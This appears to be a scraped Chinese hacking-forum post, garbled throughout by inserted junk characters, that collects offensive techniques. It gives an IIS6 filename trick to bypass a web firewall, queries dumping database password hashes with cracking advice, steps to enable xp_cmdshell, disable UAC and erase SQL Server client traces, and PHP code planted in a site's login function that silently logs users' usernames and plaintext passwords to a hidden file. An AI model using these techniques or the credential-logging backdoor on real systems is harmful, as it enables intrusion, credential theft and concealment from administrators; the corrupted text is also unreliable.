利用II6文件解析漏洞绕过安全狗代码:7 n, `. d0 M+ d; W* C
;antian365.asp;antian365.jpg
1 D$ ~7 M' m5 a2 N. t* d3 y1 @8 w- x4 `' ^' H8 A2 o/ u
各种类型数据库抓HASH破解最高权限密码!
/ o9 Q) e- \1 n1 z7 Q' X1.sql server2000- D3 t( P: v x; H" v3 l+ Z
SELECT password from master.dbo.sysxlogins where name='sa'
* [# T5 n# k: H6 `- D% U; t0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341' H' [ G7 b) H
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0 P5 f& e6 `0 e% K
0 p6 @3 E: s" k- o+ p2 I. {0×0100- constant header
- h4 E+ y( \8 d9 I34767D5C- salt
" i" {% Y/ C, [8 ]/ Q/ [! A0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
8 H/ V& v7 d1 G2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash9 n1 @) [6 s0 A* u2 N/ P
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
% Y9 a/ Z% G% l+ [: _! n$ L; S _SQL server 2005:-! k/ s7 h6 w8 N) |& Z$ O0 M
SELECT password_hash FROM sys.sql_logins where name='sa'
4 }8 O+ Q+ J# Z$ Z0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F$ Z* Y) a% @/ Z1 a' |5 a4 b8 `
0×0100- constant header
3 ~/ d$ f* Q# K2 F993BF231-salt
/ \( R" z( j. |4 h ?5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash+ g6 u4 @& v, v: I* ]
crack case sensitive hash in cain, try brute force and dictionary based attacks., M% J+ p. A3 J) i
) G3 v' z# U) ]+ F/ q% j' u2 aupdate:- following bernardo’s comments:-- g/ W$ K9 _, T5 G7 q4 U( u. L
use function fn_varbintohexstr() to cast password in a hex string.
; `3 Y* O4 N3 H' Z% a/ j, ge.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins Z, c8 |( z) A* x* ^: K+ G, n
5 H6 {9 D: w' i/ m/ D) E3 ^* x
MYSQL:-% r# g1 u" i& K2 a! B0 \, U
( t S$ Z; D( f" I, Q
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.7 y. |$ {; A4 p% j: n$ @6 T+ w* W
$ H/ u% }/ Z* p+ b*mysql < 4.1
! H* Q. e( v/ A/ Y' m, ?& U5 A) {/ l* g# {6 j$ Q1 l8 U) ]: c
mysql> SELECT PASSWORD(‘mypass’);
0 f9 p5 a; Y) e( a% `6 |+——————–+
! a; Q) Q; ~1 U2 V| PASSWORD(‘mypass’) |2 A2 S" C/ H% p$ @& y1 [
+——————–+
) o Q; n; z, N% F" x; Y) Y| 6f8c114b58f2ce9e |
. u/ k& H! u8 {4 \, r2 t+——————–+7 c1 h* b4 m' @# ~. G
) J# k: }9 @+ t8 T% f! z" P
*mysql >=4.1
2 C$ B( Z& _2 V0 D5 W% J2 \5 T z8 @9 L' j" @
mysql> SELECT PASSWORD(‘mypass’);
& {4 o8 ?+ l" X& P! C ^+ v6 N+——————————————-+- G f _5 t0 s4 X- c
| PASSWORD(‘mypass’) |
6 r/ P1 S! L @+——————————————-+! ~! b3 v( O) P; E2 N ?1 @
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |" M0 s$ U0 p1 K2 a( w4 U$ i1 I
+——————————————-+
( \/ W7 O T, S2 X% e. x9 b- L/ Q) |3 Z k
Select user, password from mysql.user
1 E/ u O% s# d; UThe hashes can be cracked in ‘cain and abel’
' s6 v3 v2 l$ `, W7 }" l
" A! x5 ~- u) @9 ^& vPostgres:-
% J1 G1 ^# e5 p) l7 {1 P- S) B' oPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
' F" o: J# k/ tselect usename, passwd from pg_shadow;- z2 [' x- s0 W2 p
usename | passwd
7 [& k8 K$ y4 h$ {# E5 V——————+————————————-$ }% N( K& n/ a% B% T& I* P
testuser | md5fabb6d7172aadfda4753bf0507ed4396
4 N. U+ J- _2 r% Z6 t, `% J+ cuse mdcrack to crack these hashes:-
4 X/ e& C4 A Z: q$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
! k9 F+ \3 x9 J+ Y. y2 {. U4 T2 S) {4 S- b$ q$ e. V: l* @: ^& l
Oracle:-" b6 \: t. S8 @9 u- g
select name, password, spare4 from sys.user$
' |8 A# c- q( `% M* j: w- ~hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
$ `$ y' H# Y/ I2 HMore on Oracle later, i am a bit bored….
2 ], Q& J. t! `" b* v3 I1 X
0 @. i8 Z7 f1 m
: F6 _( s, ]( b6 V在sql server2005/2008中开启xp_cmdshell
# N2 u: Y$ `/ [-- To allow advanced options to be changed.# x; P! l9 n# U* _! y
EXEC sp_configure 'show advanced options', 1# M0 e* Z- Z5 ?; [
GO
3 ?' [4 b5 e% F$ e* M-- To update the currently configured value for advanced options.
& l: L0 X" r8 Q( z+ CRECONFIGURE
; \: \2 w3 Z& N4 s5 ~GO1 ?- Q. ]! a3 Y0 m
-- To enable the feature.
& ]9 u% r+ |, { a. P) S8 PEXEC sp_configure 'xp_cmdshell', 1, I5 k% M2 L" k t
GO
. p* M6 l/ C, U0 w1 s-- To update the currently configured value for this feature.
" ]; k7 \1 o" v5 `3 @RECONFIGURE Q" _! _- ]5 |+ P8 \: q2 d
GO
6 n" M2 x7 V+ K4 E6 PSQL 2008 server日志清除,在清楚前一定要备份。
8 L3 ^# P; L! @( J0 V如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
0 h+ C" x( k: h8 T0 KX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin4 [1 i, O1 V: w5 m
1 K8 c' I2 O/ y1 T# R: q6 a: n
对于SQL Server 2008以前的版本:) x2 o6 f$ j: v5 D2 A: o1 j
SQL Server 2005:7 j+ Z1 g) z% e, K
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat# \' W3 u: k/ o: j& A' q
SQL Server 2000:/ ^* V' e; a& M, N# h- p5 E
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。4 l* M% a: Z3 _3 }5 k( \
* t; R" C7 u5 G' u1 g; f0 y本帖最后由 simeon 于 2013-1-3 09:51 编辑9 h# C3 i& M7 [$ f
9 ~+ K" s J) J+ t9 C) m& `* _" X8 g# L# a0 R2 `7 S
windows 2008 文件权限修改9 F9 |1 |+ n9 R; H G# L5 I+ q
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx* {0 N& N8 V# E6 O+ U
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad987 M/ ~, v5 B& t/ Q' h
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
# U1 `8 l- T0 E: O! @1 w' R. ]; @9 ~, k; H! \1 j( {; c7 X
Windows Registry Editor Version 5.00# [4 w6 C7 V2 Q9 u- U8 t% S
[HKEY_CLASSES_ROOT\*\shell\runas]. C; P+ O+ |1 ~2 g, @
@="管理员取得所有权"
/ L! Y3 ]4 ]1 u* o( V+ {4 u"NoWorkingDirectory"=""
% H" Z' ]1 {& O2 j. s[HKEY_CLASSES_ROOT\*\shell\runas\command]. Q$ e) D2 y7 O# i0 Y4 o. l6 e
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"+ c/ N7 h' A' y
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"; C' w% B9 f" E* b. \5 j
[HKEY_CLASSES_ROOT\exefile\shell\runas2]! W# O9 B3 H5 ?' z
@="管理员取得所有权"" V# n% L$ z9 I
"NoWorkingDirectory"=""2 L, w4 ]5 G" ?* X5 w! A
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
5 y9 y* U2 i' y4 {@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", G. Y- a, J* Q9 \/ m
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 V2 T3 p. Y, w7 R, a) v F) y6 r
! L, B3 A9 v! T" P8 D- F[HKEY_CLASSES_ROOT\Directory\shell\runas]
4 u, }7 U5 z7 W: a7 f@="管理员取得所有权"1 {# ]1 B- _ M) v3 G; n
"NoWorkingDirectory"=""
* h1 q |4 H0 B* ][HKEY_CLASSES_ROOT\Directory\shell\runas\command]1 Z6 e0 W. U) s$ X
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; v+ A4 m- T0 G# k$ ?+ N5 `: c
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
4 _( K; o) B) b& |+ t! ?
' }( l! p! H7 u# {0 B! F
# o' P* J9 k# x6 ewin7右键“管理员取得所有权”.reg导入+ i9 z2 n* w- P0 R
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,8 o9 p1 t! [/ |" u- _0 S5 R
1、C:\Windows这个路径的“notepad.exe”不需要替换
4 R U$ D$ f: l1 q( g; {2、C:\Windows\System32这个路径的“notepad.exe”不需要替换' V# F# ?/ u# I* P9 L" x# W
3、四个“notepad.exe.mui”不要管% x/ m3 Z! q6 s
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和- L# f5 _7 V7 p( u- i/ _
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
7 {$ }) O0 q. d; f; }替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,/ |- X) s o; e
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
: A" d+ W0 V/ `7 ~7 p9 iwindows 2008中关闭安全策略:
' C( u, q3 U! l9 o1 U9 O! j# Dreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
) A# T; H I$ U. Y! D修改uc_client目录下的client.php 在* r1 l, M: z* z: j1 ~) p
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
7 V+ }9 ~; m( |; S* v% i! [8 w" I( v下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
- x5 z7 E. w( b0 `/ Q7 Z你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
- h% \, ^+ u. F. `6 i/ i1 s" Mif(getenv('HTTP_CLIENT_IP')) {1 S4 u! f; t/ t5 ^9 e
$onlineip = getenv('HTTP_CLIENT_IP');" c" V3 M c8 n Z- ?" X" E8 ~6 x
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
9 `0 j r' i# A% E! s0 j$onlineip = getenv('HTTP_X_FORWARDED_FOR');5 Y) s/ A6 h5 F$ x. K7 B
} elseif(getenv('REMOTE_ADDR')) {
: r3 J" G4 W' T L* g+ q# ~. s$onlineip = getenv('REMOTE_ADDR');5 Q5 F" g' t% e+ ?+ n+ ~$ \% ]
} else {
: D+ d* H- \/ Q1 v, i# Q4 b$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];5 [+ @1 C" A3 q/ y5 Z$ E. o
}7 ?% P4 ^6 S1 d8 R7 y- t9 W
$showtime=date("Y-m-d H:i:s");
0 W* ^; ^8 V9 L% M6 s! b $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
: _+ G! X0 |9 I1 w# t' K $handle=fopen('./data/cache/csslog.php','a+');
/ }$ ^, r+ L4 w* L; v5 o $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对